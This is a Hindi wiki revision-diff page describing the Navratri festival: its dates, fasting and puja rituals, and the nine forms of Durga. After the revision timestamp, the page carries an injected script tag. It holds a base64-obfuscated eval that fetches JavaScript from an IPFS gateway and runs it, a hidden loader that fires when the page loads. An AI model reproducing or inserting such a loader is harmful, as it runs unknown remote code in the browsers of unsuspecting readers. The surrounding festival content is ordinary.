"नवरात्रि" के अवतरणों में अंतर

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
नेविगेशन पर जाएँ खोज पर जाएँ
पंक्ति १: पंक्ति १:
{{Menu}}<br/ >
+
{{Menu}}
 
{{दुर्गा}}
 
{{दुर्गा}}
 
==नवरात्रि / शारदीय नवरात्र / Navratri==
 
==नवरात्रि / शारदीय नवरात्र / Navratri==
 
आश्विन शुक्ल प्रतिपदा से नवमी तक नवरात्रि का त्यौहार बड़े धूमधाम से मनाया जाता है । नवरात्रि में देवी माँ के व्रत रखे जाते हैं । स्थान–स्थान पर देवी माँ की मूर्तियाँ बनाकर उनकी विशेष पूजा की जाती हैं । घरों में भी अनेक स्थानों पर कलश स्थापना कर[[दुर्गा]] सप्तशती पाठ आदि होते हैं । [[नरीसेमरी]] में देवी माँ की जोत के लिए श्रृद्धालु आते हैं और पूरे नवरात्रि के दिनों में भारी मेला रहता है । शारदीय नवरात्र आश्विन मास के शुक्ल पक्ष की प्रतिपदा से नवमी तक यह व्रत किए जाते हैं।  भगवती के नौ प्रमुख रूप (अवतार) हैं तथा प्रत्येक बार 9-9 दिन ही ये विशिष्ट पूजाएं की जाती हैं।  इस काल को नवरात्र कहा जाता है। वर्ष में दो बार भगवती भवानी की विशेष पूजा की जाती है। इनमें एक नवरात्र तो चैत्र शुक्ल प्रतिपदा से नवमी तक होते हैं और दूसरे श्राद्धपक्ष के दूसरे दिन आश्विन शुक्ल प्रतिपदा से आश्विन शुक्ल नवमी तक।  आश्विन मास के इन नवरात्रों को 'शारदीय नवरात्र' कहा जाता है क्योंकि इस समय शरद ऋतु होती है। इस व्रत में नौ दिन तक भगवती दुर्गा का पूजन, दुर्गा सप्तशती का पाठ तथा एक समय भोजन का व्रत धारण किया जाता है। प्रतिपदा के दिन प्रात: स्नानादि करके संकल्प करें तथा स्वयं या पण्डित के द्वारा मिट्टी की वेदी बनाकर जौ बोने चाहिए।  उसी पर घट स्थापना करें।  फिर घट के ऊपर कुलदेवी की प्रतिमा स्थापित कर उसका पूजन करें तथा 'दुर्गा सप्तशती' का पाठ कराएं। पाठ-पूजन के समय अखण्ड दीप जलता रहना चाहिएं  वैष्णव लोग राम की मूर्ति स्थापित कर रामायण का पाठ करते हैं। दुर्गा अष्टमी तथा नवमी को भगवती दुर्गा देवी की पूर्ण आहुति दी जाती है। नैवेद्य, चला, हलुआ, खीर आदि से भोग लगाकर कन्या तथा छोटे बच्चों को भोजन कराना चाहिएं  नवरात्र ही शक्ति पूजा का समय है इसलिए नवरात्र में इन शक्तियों की पूजा करनी चाहिए।  
 
आश्विन शुक्ल प्रतिपदा से नवमी तक नवरात्रि का त्यौहार बड़े धूमधाम से मनाया जाता है । नवरात्रि में देवी माँ के व्रत रखे जाते हैं । स्थान–स्थान पर देवी माँ की मूर्तियाँ बनाकर उनकी विशेष पूजा की जाती हैं । घरों में भी अनेक स्थानों पर कलश स्थापना कर[[दुर्गा]] सप्तशती पाठ आदि होते हैं । [[नरीसेमरी]] में देवी माँ की जोत के लिए श्रृद्धालु आते हैं और पूरे नवरात्रि के दिनों में भारी मेला रहता है । शारदीय नवरात्र आश्विन मास के शुक्ल पक्ष की प्रतिपदा से नवमी तक यह व्रत किए जाते हैं।  भगवती के नौ प्रमुख रूप (अवतार) हैं तथा प्रत्येक बार 9-9 दिन ही ये विशिष्ट पूजाएं की जाती हैं।  इस काल को नवरात्र कहा जाता है। वर्ष में दो बार भगवती भवानी की विशेष पूजा की जाती है। इनमें एक नवरात्र तो चैत्र शुक्ल प्रतिपदा से नवमी तक होते हैं और दूसरे श्राद्धपक्ष के दूसरे दिन आश्विन शुक्ल प्रतिपदा से आश्विन शुक्ल नवमी तक।  आश्विन मास के इन नवरात्रों को 'शारदीय नवरात्र' कहा जाता है क्योंकि इस समय शरद ऋतु होती है। इस व्रत में नौ दिन तक भगवती दुर्गा का पूजन, दुर्गा सप्तशती का पाठ तथा एक समय भोजन का व्रत धारण किया जाता है। प्रतिपदा के दिन प्रात: स्नानादि करके संकल्प करें तथा स्वयं या पण्डित के द्वारा मिट्टी की वेदी बनाकर जौ बोने चाहिए।  उसी पर घट स्थापना करें।  फिर घट के ऊपर कुलदेवी की प्रतिमा स्थापित कर उसका पूजन करें तथा 'दुर्गा सप्तशती' का पाठ कराएं। पाठ-पूजन के समय अखण्ड दीप जलता रहना चाहिएं  वैष्णव लोग राम की मूर्ति स्थापित कर रामायण का पाठ करते हैं। दुर्गा अष्टमी तथा नवमी को भगवती दुर्गा देवी की पूर्ण आहुति दी जाती है। नैवेद्य, चला, हलुआ, खीर आदि से भोग लगाकर कन्या तथा छोटे बच्चों को भोजन कराना चाहिएं  नवरात्र ही शक्ति पूजा का समय है इसलिए नवरात्र में इन शक्तियों की पूजा करनी चाहिए।  
 
[[चित्र:Durga-Devi.jpg|thumb|250|[[दुर्गा]] देवी<br />Durga Devi]]
 
[[चित्र:Durga-Devi.jpg|thumb|250|[[दुर्गा]] देवी<br />Durga Devi]]
__TOC__
+
 
 
#[[प्रथम शैलपुत्री]]
 
#[[प्रथम शैलपुत्री]]
 
#[[द्वितीयं ब्रह्मचारिणी]]
 
#[[द्वितीयं ब्रह्मचारिणी]]

०६:३५, ६ मार्च २०१० का अवतरण

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अन्य सम्बंधित लेख


नवरात्रि / शारदीय नवरात्र / Navratri

आश्विन शुक्ल प्रतिपदा से नवमी तक नवरात्रि का त्यौहार बड़े धूमधाम से मनाया जाता है । नवरात्रि में देवी माँ के व्रत रखे जाते हैं । स्थान–स्थान पर देवी माँ की मूर्तियाँ बनाकर उनकी विशेष पूजा की जाती हैं । घरों में भी अनेक स्थानों पर कलश स्थापना करदुर्गा सप्तशती पाठ आदि होते हैं । नरीसेमरी में देवी माँ की जोत के लिए श्रृद्धालु आते हैं और पूरे नवरात्रि के दिनों में भारी मेला रहता है । शारदीय नवरात्र आश्विन मास के शुक्ल पक्ष की प्रतिपदा से नवमी तक यह व्रत किए जाते हैं। भगवती के नौ प्रमुख रूप (अवतार) हैं तथा प्रत्येक बार 9-9 दिन ही ये विशिष्ट पूजाएं की जाती हैं। इस काल को नवरात्र कहा जाता है। वर्ष में दो बार भगवती भवानी की विशेष पूजा की जाती है। इनमें एक नवरात्र तो चैत्र शुक्ल प्रतिपदा से नवमी तक होते हैं और दूसरे श्राद्धपक्ष के दूसरे दिन आश्विन शुक्ल प्रतिपदा से आश्विन शुक्ल नवमी तक। आश्विन मास के इन नवरात्रों को 'शारदीय नवरात्र' कहा जाता है क्योंकि इस समय शरद ऋतु होती है। इस व्रत में नौ दिन तक भगवती दुर्गा का पूजन, दुर्गा सप्तशती का पाठ तथा एक समय भोजन का व्रत धारण किया जाता है। प्रतिपदा के दिन प्रात: स्नानादि करके संकल्प करें तथा स्वयं या पण्डित के द्वारा मिट्टी की वेदी बनाकर जौ बोने चाहिए। उसी पर घट स्थापना करें। फिर घट के ऊपर कुलदेवी की प्रतिमा स्थापित कर उसका पूजन करें तथा 'दुर्गा सप्तशती' का पाठ कराएं। पाठ-पूजन के समय अखण्ड दीप जलता रहना चाहिएं वैष्णव लोग राम की मूर्ति स्थापित कर रामायण का पाठ करते हैं। दुर्गा अष्टमी तथा नवमी को भगवती दुर्गा देवी की पूर्ण आहुति दी जाती है। नैवेद्य, चला, हलुआ, खीर आदि से भोग लगाकर कन्या तथा छोटे बच्चों को भोजन कराना चाहिएं नवरात्र ही शक्ति पूजा का समय है इसलिए नवरात्र में इन शक्तियों की पूजा करनी चाहिए।

थंबनेल बनाने में त्रुटि हुई है: /bin/bash: /usr/local/bin/convert: No such file or directory Error code: 127
दुर्गा देवी
Durga Devi
  1. प्रथम शैलपुत्री
  2. द्वितीयं ब्रह्मचारिणी
  3. तृतीय चंद्रघंटा
  4. चतुर्थ कूष्माण्डा
  5. पंचम स्कन्दमाता
  6. षष्टमं कात्यायनी
  7. सप्तमं कालरात्रि
  8. अष्टमं महागौरी
  9. नवम् सिध्दीदात्री




साँचा:पर्व और त्यौहार